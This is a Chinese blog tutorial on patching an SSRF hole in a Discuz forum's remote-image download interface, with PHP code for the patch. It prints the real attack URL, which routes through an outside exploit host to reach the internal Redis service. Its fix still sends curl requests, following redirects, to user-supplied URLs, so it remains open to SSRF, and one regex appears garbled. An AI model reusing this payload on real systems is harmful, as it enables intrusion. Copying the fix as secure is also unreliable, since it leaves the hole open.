一聚教程网:一个值得你收藏的教程网站

最新下载

SSRF导致命令执行可反弹Shell漏洞解决办法

时间:2016-07-08 00:00:00 编辑:简简单单 来源:转载

迅雷官方论坛(discuz)被乌云平台检测出一个SSRF漏洞,攻击者通过SSRF成功反弹shell,漏洞存在于一个远程图片下载的接口,没有对url进行有效的合法性检测。今天临时解决了这个漏洞,记录一下修复方法。

SSRF导致命令执行可反弹Shell漏洞解决办法

漏洞还没有公开,现在是凭密码才能访问。

这个存在漏洞的url地址是/forum.php?mod=ajax&action=downremoteimg&message=

攻击者请求这个地址即可进行SSRF攻击:

/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]

这里message包含用户在论坛发布的图片地址,正常情况下是图片格式后缀,虽然对后缀进行了判断,但是判断不严格,这个地址可以传任意的脚本。

解决办法是在接口增加合法性判断,判断url真实的后缀是否合法,即使合法,也可能通过url rewrite方式伪造,更严格的判断通过curl请求获取头信息,根据返回的报文头判断Content-Type是否合法。

于是,在文件/source/module/forum/forum_ajax.php文件新增以下几个函数:

PHP

//获取上传图片url列表
function getImageList($temp)
{
    $urlList = array();
    foreach ($temp as $item) {
        $urlList[] = $item[1];
    }
    return $urlList;
}

/**
 * 检查content-type是否合法
 * @param $imageList array 图片url列表
 * @return bool true合法 false非法
 */
function checkContentType($imageList)
{
    $allowExtensions = array('jpg', 'jpeg', 'png', 'gif', 'bmp');
    $allowTypes = array('image/png', 'image/x-png', 'image/gif', 'image/jpeg', 'image/pjpeg');
    foreach ($imageList as $url) {
        $extension = getUrlExtension($url);
        if(!in_array(strtolower($extension), $allowExtensions)){
            return false;
        }
        $contentType = getContentType($url);
        if (!in_array($contentType, $allowTypes)) {
            return false;
        }
    }
    return true;
}

//获取content-type
function getContentType($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_NOBODY, 1);
    curl_exec($ch);
    $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    return $contentType;
}

//获取url后缀
function getUrlExtension($url)
{
    $parseurl = parse_url($url);
    $extension = pathinfo($parseurl['path'], PATHINFO_EXTENSION);
    return $extension;
}

在具体接口处理的地方新增:

PHP

elseif($_GET['action'] == 'downremoteimg') {
 $_GET['message'] = str_replace(array("\r", "\n"), array($_GET['wysiwyg'] ? '
' : '', "\\n"), $_GET['message']);
 preg_match_all("/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]|\[img=\d{1,4}[x|\,]\d{1,4}\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/is", $_GET['message'], $image1, PREG_SET_ORDER);
 preg_match_all("/\/ismUe", $_GET['message'], $image2, PREG_SET_ORDER);
 $temp = $aids = $existentimg = array();
 if(is_array($image1) && !empty($image1)) {
  foreach($image1 as $value) {
   $temp[] = array(
    '0' => $value[0],
    '1' => trim(!empty($value[1]) ? $value[1] : $value[2])
   );
  }
 }
 if(is_array($image2) && !empty($image2)) {
  foreach($image2 as $value) {
   $temp[] = array(
    '0' => $value[0],
    '1' => trim($value[2])
   );
  }
 }

 //检测图片是否合法 Added by tanteng 2016.07.07
        if(is_array($temp) && !empty($temp)){
            $imageList = getImageList($temp);
            $check = checkContentType($imageList);
            if ($check === false) {
                die('file upload error!');
            }
}

首先判断url后缀是否合法,再通过curl请求判断header的Content-Type是否合法,因为后者不容易伪造。其中curl判断文件Content-Type方法:

PHP

//获取content-type
function getContentType($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_NOBODY, 1);
    curl_exec($ch);
    $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    return $contentType;
}

再访问乌云公开的漏洞地址,直接中止程序。

不过,这样做有一个问题,有的图片地址并不是真实的静态文件,如:http://image.demo.com/avatar/100/150*150,这个路径就是一个图片,尽管不是图片格式的静态路径,那么这样判断就会误判,不过这种情况是很少数,暂且不管。

文章评论

热门栏目